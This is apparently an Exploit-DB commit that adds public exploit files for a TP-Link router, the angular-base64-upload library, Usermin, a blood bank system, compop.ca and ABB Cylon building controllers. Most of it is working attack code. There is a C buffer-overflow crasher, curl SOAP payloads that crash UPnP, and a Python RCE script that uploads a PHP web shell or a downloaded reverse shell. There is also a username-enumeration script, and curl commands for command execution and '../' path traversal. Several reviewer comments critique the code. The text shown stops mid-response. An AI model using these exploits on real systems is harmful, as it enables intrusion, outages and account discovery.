DB: 2025-04-18

10 changes to exploits/shellcodes/ghdb

TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)

Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)

Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation

compop.ca 3.5.3 - Arbitrary code Execution

Usermin 2.100 - Username Enumeration

ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution

ABB Cylon Aspect 3.08.02 (ethernetUpdate.php)  - Authenticated Path Traversal

AnyDesk 9.0.1 - Unquoted Service Path
Exploit-DB 2025-04-18 00:16:31 +00:00
parent 7ebfc36557
commit 9ddf81331a
10 changed files with 849 additions and 0 deletions


@ -0,0 +1,248 @@
* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
* Date: 11/24/2024
* Exploit Author: Mohamed Maatallah
* Vendor Homepage: https://www.tp-link.com
* Version: TT_V6.2.1021 (VN020-F3v(T))
* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
* CVE: CVE-2024-12344
* Category: Remote
* Description:
* A critical buffer overflow and memory corruption vulnerability was discovered in TP-Link VN020-F3v(T) router's FTP server implementation. The vulnerability stems from improper input validation of the USER command, allowing unauthenticated attackers to trigger various failure modes through payload size manipulation:
* 1. 1100 bytes - Delayed crash (5-10 seconds)
* 2. 1450 bytes - Immediate crash
* 3. >1450 bytes - Undefined behavior/state corruption
* Proof of Concept: (attached full c file)
* Compilation Instructions (Visual Studio):
* ---------------------------------------
* 1. Open Visual Studio
* 2. Create a new C Console Application
* 3. Add these additional dependencies to project settings:
* - ws2_32.lib
* - iphlpapi.lib
* 4. Ensure Windows SDK is installed
* 5. Set Platform Toolset to latest v143 or v142
* 6. Compile in Release or Debug mode
*
* Disclaimer:
* ----------
* This proof of concept is for educational and research purposes only.
* Unauthorized testing without explicit permission is unethical and illegal.
*/
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdint.h>
#include <windows.h>
#include <iphlpapi.h>
#include <icmpapi.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "iphlpapi.lib")
// Target configuration - MODIFY BEFORE TESTING
#define DEST_IP "192.168.1.1" // IP of target FTP server
#define DEST_PORT 21 // Standard FTP port
#define PING_TIMEOUT_MS 1000 // Network timeout
#define MAX_PING_RETRIES 5 // Connectivity check attempts
// 1450: Instant
// 1100: Delayed
#define CRASH_STRING_LENGTH 1450 // Exact number of 'A's triggering instantcrash
#define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2) // USER + As + \r\n
typedef struct {
HANDLE icmp_handle;
IPAddr target_addr;
LPVOID reply_buffer;
DWORD reply_size;
} ping_context_t;
void log_msg(const char* prefix, const char* msg) {
SYSTEMTIME st;
GetLocalTime(&st);
printf("[%02d:%02d:%02d] %s %s\n", st.wHour, st.wMinute, st.wSecond, prefix, msg);
}
void hexdump(const char* desc, const void* addr, const int len) {
int i;
unsigned char buff[17];
const unsigned char* pc = (const unsigned char*)addr;
if (desc != NULL)
printf("%s:\n", desc);
for (i = 0; i < len; i++) {
if ((i % 16) == 0) {
if (i != 0)
printf(" %s\n", buff);
printf(" %04x ", i);
}
printf(" %02x", pc[i]);
if ((pc[i] < 0x20) || (pc[i] > 0x7e))
buff[i % 16] = '.';
else
buff[i % 16] = pc[i];
buff[(i % 16) + 1] = '\0';
}
while ((i % 16) != 0) {
printf(" ");
i++;
}
printf(" %s\n", buff);
}
BOOL check_connectivity(ping_context_t* ctx) {
char send_buf[32] = { 0 };
return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf),
NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0;
}
char* generate_exact_crash_payload() {
char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1); // +1 for null terminator
if (!payload) {
log_msg("[-]", "Failed to allocate payload memory");
return NULL;
}
// Construct the exact payload that causes crash
strcpy(payload, "USER "); // 5 bytes
memset(payload + 5, 'A', CRASH_STRING_LENGTH); // 1450 'A's
memcpy(payload + 5 + CRASH_STRING_LENGTH, "\r\n", 2); // 2 bytes
payload[TOTAL_PAYLOAD_LENGTH] = '\0';
char debug_msg[100];
snprintf(debug_msg, sizeof(debug_msg), "Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)",
TOTAL_PAYLOAD_LENGTH);
log_msg("[*]", debug_msg);
return payload;
}
BOOL send_crash_payload(const char* target_ip, uint16_t target_port) {
WSADATA wsa;
SOCKET sock = INVALID_SOCKET;
struct sockaddr_in server;
char server_reply[2048];
int recv_size;
ping_context_t ping_ctx = { 0 };
BOOL success = FALSE;
// Initialize Winsock
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
log_msg("[-]", "Winsock initialization failed");
return FALSE;
}
// Setup ICMP for connectivity monitoring
ping_ctx.icmp_handle = IcmpCreateFile();
ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32;
ping_ctx.reply_buffer = malloc(ping_ctx.reply_size);
inet_pton(AF_INET, target_ip, &ping_ctx.target_addr);
// Create socket
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == INVALID_SOCKET) {
log_msg("[-]", "Socket creation failed");
goto cleanup;
}
// Setup server address
server.sin_family = AF_INET;
server.sin_port = htons(target_port);
inet_pton(AF_INET, target_ip, &server.sin_addr);
// Connect to FTP server
log_msg("[*]", "Connecting to target FTP server...");
if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
log_msg("[-]", "Connection failed");
goto cleanup;
}
log_msg("[+]", "Connected successfully");
// Verify initial connectivity
if (!check_connectivity(&ping_ctx)) {
log_msg("[-]", "No initial connectivity to target");
goto cleanup;
}
// Receive banner
if ((recv_size = recv(sock, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR) {
log_msg("[-]", "Failed to receive banner");
goto cleanup;
}
server_reply[recv_size] = '\0';
log_msg("[*]", server_reply);
// Generate and send the exact crash payload
char* payload = generate_exact_crash_payload();
if (!payload) {
goto cleanup;
}
log_msg("[*]", "Sending crash payload...");
hexdump("Payload hex dump (first 32 bytes)", payload, 32);
if (send(sock, payload, TOTAL_PAYLOAD_LENGTH, 0) < 0) {
log_msg("[-]", "Failed to send payload");
free(payload);
goto cleanup;
}
free(payload);
log_msg("[+]", "Payload sent successfully");
// Monitor for crash
log_msg("[*]", "Monitoring target status...");
Sleep(1000); // Wait a bit for crash to take effect
int failed_pings = 0;
for (int i = 0; i < MAX_PING_RETRIES; i++) {
if (!check_connectivity(&ping_ctx)) {
failed_pings++;
if (failed_pings >= 3) {
log_msg("[+]", "Target crash confirmed!");
success = TRUE;
goto cleanup;
}
}
Sleep(500);
}
log_msg("[-]", "Target appears to still be responsive");
cleanup:
if (sock != INVALID_SOCKET) {
closesocket(sock);
}
if (ping_ctx.icmp_handle != INVALID_HANDLE_VALUE) {
IcmpCloseHandle(ping_ctx.icmp_handle);
}
if (ping_ctx.reply_buffer) {
free(ping_ctx.reply_buffer);
}
WSACleanup();
return success;
}
int main(void) {
printf("\nTP-Link VN020 FTP Memory Corruption PoC\n");
printf("---------------------------------------\n");
printf("Target: %s:%d\n", DEST_IP, DEST_PORT);
if (send_crash_payload(DEST_IP, DEST_PORT)) {
printf("\nExploit successful - target crashed\n");
}
else {
printf("\nExploit failed - target may be patched\n");
}
return 0;
}
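Review bot: The verdict printed in `main` is not reliable evidence of patch state: `Exploit failed - target may be patched` is shown for every FALSE return from `send_crash_payload`, which also covers Winsock, socket, connect, banner and initial-ping failures. The positive verdict is loose too, since three missed ICMP echoes out of five are reported as `Target crash confirmed!`, which transient packet loss would also produce. I would change the negative message to `printf("\nNo crash observed - result inconclusive\n");` and state in the header comment that the status check is ICMP-only. Separately, `strcpy`, `memset` and `memcpy` are used with no `<string.h>` in the visible include list (presumably a transitive include), and the `malloc` for `ping_ctx.reply_buffer`, the `IcmpCreateFile()` result and both `inet_pton` calls are unchecked.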


@ -0,0 +1,43 @@
# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342
Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.
Proof of Concept 1 (Missing Parameters DoS):
curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:AddPortMapping>
<NewPortMappingDescription>hello</NewPortMappingDescription>
</u:AddPortMapping></s:Body></s:Envelope>'
Proof of Concept 2 (Memory Corruption):
curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:SetConnectionType
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewConnectionType>'"$(perl -e 'print "%x" x
10000;')"'</NewConnectionType>
</u:SetConnectionType>
</s:Body>
</s:Envelope>'
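Review bot: The description announces two vulnerabilities in the UPnP WANIPConnection service, but the header carries a single identifier, CVE-2024-12342, and the title names only the denial of service, so a reader cannot tell whether the `SetConnectionType` memory-corruption case is tracked under the same CVE. The write-up also gives no fixed firmware version or workaround. I would add a line per PoC naming its CVE, plus `# Fixed in: <firmware version, to be supplied by the author>`, so defenders can map the entry to their patch status.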


@ -0,0 +1,180 @@
# Exploit Title: Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)
# Date: 10 October 2024
# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
# Software Link: https://github.com/adonespitogo/angular-base64-upload
# Version: prior to v0.1.21
# Tested on: Arch Linux
# CVE : CVE-2024-42640
# Severity: Critical - 10.0 (CVSS 4.0)
# Github Link : https://github.com/rvizx/CVE-2024-42640
# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
import re
import subprocess
import requests
import sys
import os
import uuid
import base64
import cmd
from urllib.parse import urlparse
def banner():
print('''
\033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
\033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
https://github.com/rvizx/\033[0mCVE-2024-42640
''')
def check_version(target):
response = requests.get(target)
first_line = response.text.splitlines()[0].strip()
match = re.search(r'v0\.(1|0)\.(\d+)', first_line)
if match:
version = match.group(0)
x_value = int(match.group(1))
if x_value <= 20:
print(f"\033[94m[inf]:\033[0m target is using a vulnerable version. [version]: {version}")
else:
print(f"\033[91m[err]:\033[0m target is not vulnerable [version]: {version}")
exit()
else:
print("\033[91m[err]:\033[0m couldn't find the version")
def enum(url):
print("\033[94m[inf]:\033[0m enumerating... ")
target = f"{url}/bower_components/angular-base64-upload/dist/angular-base64-upload.min.js"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using bower_components")
check_version(target)
else:
print("\033[94m[inf]:\033[0m target is not using bower_components")
target = f"{url}/node_modules/angular-base64-upload/dist/angular-base64-upload.min.js"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using node_modules")
check_version(target)
else:
print("\033[94m[inf]:\033[0m target is not using node_modules")
print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for dist/angular-base64-upload.min.js")
print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
print("\033[91m[err]:\033[0m exiting..")
exit()
exploit(target)
class CmdShell(cmd.Cmd):
username = subprocess.check_output("whoami", shell=True).strip().decode()
domain = urlparse(sys.argv[1]).netloc
prompt = f"{username}@{domain} > "
def __init__(self, payload_url):
super().__init__()
self.payload_url = payload_url
def default(self, line):
url = f"{self.payload_url}?cmd={line}"
try:
response = requests.get(url)
print(response.text)
except requests.RequestException as e:
print("\033[91m[err]:\033[0m {e}")
def do_exit(self, arg):
return True
def exploit(target):
print(f"[dbg]: {target}")
target_server_url = target.replace("dist/angular-base64-upload.min.js","demo/server.php")
print(f"[dbg]: {target_server_url}")
payload_name = str(uuid.uuid4())+".php"
if len(sys.argv) > 2:
if sys.argv[2] == "--rev":
revshell = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
port = input("\033[93m[ins]:\033[0m enter listenter port: ")
print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
input("\033[93m[ins]:\033[0m press enter to continue...")
print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
response = requests.get(revshell)
if response.status_code == 200:
payload = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
with open(payload_name, "w") as file:
file.write(payload)
payload_url = upload_to_server(payload_name,target_server_url)
print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
r = requests.get(payload_url)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m process complete!")
else:
print("\033[91m[err]:\033[0m something went wrong!")
print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
else:
print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
print("\033[91m[err]:\033[0m exiting..")
exit()
else:
payload = "<?php if($_GET['cmd']) {system($_GET['cmd']);} ?>"
with open(payload_name, "w") as file:
file.write(payload)
payload_url = upload_to_server(payload_name,target_server_url)
cmd_shell = CmdShell(payload_url)
cmd_shell.cmdloop()
def upload_to_server(payload_name,target_server_url):
try:
with open(payload_name, 'rb') as file:
file_content = file.read()
base64_payload = base64.b64encode(file_content).decode('utf-8')
headers = {
'Content-Type': 'application/json',
}
json_data = {
'base64': base64_payload,
'filename': payload_name,
}
response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
updemo_endpoint = f"uploads/{payload_name}"
print(f"[dbg]: {updemo_endpoint}")
payload_url = target_server_url.replace("server.php",updemo_endpoint)
print(f"[dbg]: {payload_url}")
if response.status_code == 200:
print(f"\033[94m[inf]:\033[0m payload is uploaded to {payload_url}")
return payload_url
else:
print("\033[91m[err]:\033[0m something went wrong! failed to upload the payload to server")
exit()
except Exception as e:
print(f"\033[91m[err]:\033[0m {e}")
exit()
if __name__ == "__main__":
try:
banner()
if len(sys.argv) > 1:
url = sys.argv[1]
print(f"\033[94m[inf]:\033[0m target: {url}")
enum(url)
else:
print("[usg]: ./exploit.py <target-url>")
print("[usg]: ./exploit.py <target-url> --rev")
exit()
except Exception as e:
print(f"\033[91m[err]:\033[0m {e}")
exit()
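Review bot: `check_version` compares the wrong capture group: `x_value = int(match.group(1))` reads the minor component, which the pattern `v0\.(1|0)\.(\d+)` limits to 0 or 1, so `x_value <= 20` is always true and every matched build is reported as vulnerable, including a fixed one. Anyone using this output to triage exposure gets false positives; the patch number is `match.group(2)`, e.g. `minor, patch = int(match.group(1)), int(match.group(2))` followed by `if minor == 0 or patch <= 20:`. The error print in `CmdShell.default` is missing its `f` prefix, and the `CmdShell` class body reads `sys.argv[1]` at definition time, so a run without arguments raises before the usage text is reached. A header comment stating that the precondition is a web-reachable `demo/server.php` under the dependency directory would tell defenders what to look for and remove.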


@ -0,0 +1,54 @@
# Exploit Title: Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
args = parser.parse_args()
if len(sys.argv) != 5:
print("Please provide the -u for URL and -w for the wordlist containing the usernames")
print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
exit()
usernameFile = open(args.wordlist_users, 'r')
dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()
for i in usernameFileIntoList:
newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
if "Failed to change password: The current password is incorrect." in response.text:
print("Possible user found with username: " + i)
if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
print("Application is most likely not vulnerable and are therefore quitting.")
exit() # comment out line 33-35 if you would still like to try username enumeration.
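Review bot: Certificate verification is switched off (`verify=False` in the `requests.post` call) and the resulting warning is suppressed globally, with no comment explaining why; a line such as `# verify=False: lab hosts use self-signed certificates, so responses are not authenticated` above the call would make that trade-off visible. The `len(sys.argv) != 5` check runs after `parse_args()` and counts raw tokens, so the `--url=...` form is rejected; declaring both options with `required=True` does the same job. The wordlist is opened without a `with` block and split on `"\n"`, which leaves an empty trailing entry when the file ends with a newline. `requests` is imported twice and `json` is never used.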


@ -0,0 +1,43 @@
#Exploit Title: Blood Bank & Donor Management System 2.4 - CSRF Improper
Input Validation
# Google Dork: N/A
# Date: 2024-12-26
# Exploit Author: Kwangyun Keum
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system/
# Version: 2.4
# Tested on: Windows 10 / Kali Linux with Apache and MySQL
# CVE: CVE-2024-12955
## Description:
Blood Bank & Donor Management System v2.4 suffers from a Cross-Site Request
Forgery (CSRF) vulnerability due to the absence of CSRF tokens for critical
functionalities such as logout. An attacker can craft a malicious iframe
embedding the logout URL and trick a victim into clicking it. This results
in the victim being logged out without their consent.
## Steps to Reproduce:
1. Deploy Blood Bank & Donor Management System v2.4.
2. Log in as any user.
3. Use the following PoC to demonstrate the issue:
```html
<html>
<body>
<iframe
src="http://localhost/bbdms/logout.php"
style="border:0px #FFFFFF none;"
name="myLogoutFrame"
scrolling="no"
frameborder="1"
marginheight="0px"
marginwidth="0px"
height="400px"
width="600px"
allowfullscreen>
</iframe>
</body>
</html>
4. Save the above HTML code as logout_poc.html.
5.Open the file in a browser and click anywhere on the page to trigger the
logout.
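Review bot: The `html` code fence opened in step 3 is never closed, so steps 4 and 5 render inside the code block; a closing fence is needed on the line after `</html>`. The title says "CSRF Improper Input Validation" while the description covers only a missing CSRF token on logout, and step 5's "click anywhere on the page" does not match a PoC in which the iframe requests `logout.php` as soon as the page loads. A one-line remediation note (state-changing actions such as logout should require a POST carrying a per-session token) would round out the write-up.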


@ -0,0 +1,26 @@
# Exploit Title: compop.ca 3.5.3 - Arbitrary code Execution
# Google Dork: Terms of Use inurl:compop.vip
# Date: 22/12/2024
# Exploit Author: dmlino
# Vendor Homepage: https://www.compop.ca/
# Version: 3.5.3
# CVE : CVE-2024-48445
The restaurant management system implements authentication using a Unix
timestamp parameter ("ts") in the URL. This implementation is vulnerable to
manipulation as it relies solely on time-based validation without proper
authentication mechanisms.
Technical Details:
The application uses a URL parameter "ts" which accepts a Unix timestamp
value.
Steps:
1. Find a vulnerable restaurant.
2. Get the current time in the UNIX format:
Linux: $date +%s
Windows Powershell: [int](Get-Date -UFormat %s -Millisecond 0)
3. Replace parameter in url with the new value
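Review bot: The title and index entry call this "Arbitrary code Execution", but the body describes only an authentication weakness around the `ts` Unix-timestamp URL parameter; nothing in the text shows code running on the server. That mismatch will skew severity triage for anyone filtering on the title. The write-up also omits what access the bypass grants and any fixed version, so a defender cannot confirm exposure from it; a short impact statement and a `# Fixed in: <version, to be supplied by the author>` line would help.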


@ -0,0 +1,79 @@
# Exploit Title: ABB Cylon Aspect 3.08.02 (deployStart.php) Unauthenticated Command Execution
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
shell command execution vulnerability through the deployStart.php script.
This allows any user to trigger the execution of 'rundeploy.sh' script, which
initializes the Java deployment server that sets various configurations,
potentially causing unauthorized server initialization and performance issues.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5891
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5891.php
CVE ID: CVE-2024-48840
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48840
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/deployStart.php


@ -0,0 +1,135 @@
# Exploit Title: ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon controller suffers from an authenticated path traversal
vulnerability. This can be exploited through the 'devName' POST parameter in
the ethernetUpdate.php script to write partially controlled content, such as
IP address values, into arbitrary file paths, potentially leading to configuration
tampering and system compromise including denial of service scenario through
ethernet configuration backup file overwrite.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5890
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5890.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/ethernetUpdate.php \
> -d "listFile=%2Fusr%2Flocal%2Faam%2Fetc%2Feth0\
> &devName=../../../../../../../home/MIX_CMIX/htmlroot/testingus\
> &useDHCP=1\
> &dhcp=YES\
> &IP1=192&IP2=168&IP3=73&IP4=31\
> &SM1=255&SM2=255&SM3=255&SM4=0\
> &N1=192&N2=168&N3=1&N4=0\
> &B1=192&B2=168&B3=1&B4=255\
> &GW1=192&GW2=168&GW3=1&GW4=254\
> &DNSA1=&DNSA2=&DNSA3=&DNSA4=\
> &DNSB1=&DNSB2=&DNSB3=&DNSB4=\
> &submitTime=Submit" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
<title>Web Server Configuration</title>
<link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>
<body class="workscroll" topmargin="0" leftmargin="0" scroll="No">
<h1>Ethernet Settings</h1>
<p class="subtitle">
